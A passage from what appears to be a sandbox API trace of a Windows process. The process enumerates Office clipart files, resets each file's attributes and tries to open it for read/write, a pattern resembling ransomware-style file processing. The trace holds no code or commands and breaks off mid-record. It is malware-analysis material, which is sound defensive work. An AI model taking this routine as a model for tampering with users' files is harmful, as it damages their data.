[0133.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.830] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.830] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF", dwFileAttributes=0x80) returned 0 [0133.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.831] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.831] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF", dwFileAttributes=0x80) returned 0 [0133.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.832] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF", dwFileAttributes=0x80) returned 0 [0133.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.832] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.832] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF", dwFileAttributes=0x80) returned 0 [0133.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.833] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF", dwFileAttributes=0x80) returned 0 [0133.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.833] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF", dwFileAttributes=0x80) returned 0 [0133.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.834] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF", dwFileAttributes=0x80) returned 0 [0133.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.835] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF", dwFileAttributes=0x80) returned 0 [0133.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.835] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF", dwFileAttributes=0x80) returned 0 [0133.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.836] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.836] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.836] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF", dwFileAttributes=0x80) returned 0 [0133.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.837] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF", dwFileAttributes=0x80) returned 0 [0133.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.838] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF", dwFileAttributes=0x80) returned 0 [0133.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.838] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.838] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF", dwFileAttributes=0x80) returned 0 [0133.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.839] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.839] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.839] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF", dwFileAttributes=0x80) returned 0 [0133.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.840] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF", dwFileAttributes=0x80) returned 0 [0133.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.840] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF", dwFileAttributes=0x80) returned 0 [0133.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.841] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.841] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF", dwFileAttributes=0x80) returned 0 [0133.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.842] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF", dwFileAttributes=0x80) returned 0 [0133.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.843] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.843] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF", dwFileAttributes=0x80) returned 0 [0133.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.843] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.843] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF", dwFileAttributes=0x80) returned 0 [0133.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.844] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.844] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.845] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF", dwFileAttributes=0x80) returned 0 [0133.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.845] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF", dwFileAttributes=0x80) returned 0 [0133.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.846] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.846] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF", dwFileAttributes=0x80) returned 0 [0133.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.847] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF", dwFileAttributes=0x80) returned 0 [0133.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.847] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF", dwFileAttributes=0x80) returned 0 [0133.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.848] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF", dwFileAttributes=0x80) returned 0 [0133.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.848] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF", dwFileAttributes=0x80) returned 0 [0133.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF", dwFileAttributes=0x80) returned 0 [0133.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.850] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF", dwFileAttributes=0x80) returned 0 [0133.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.851] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) 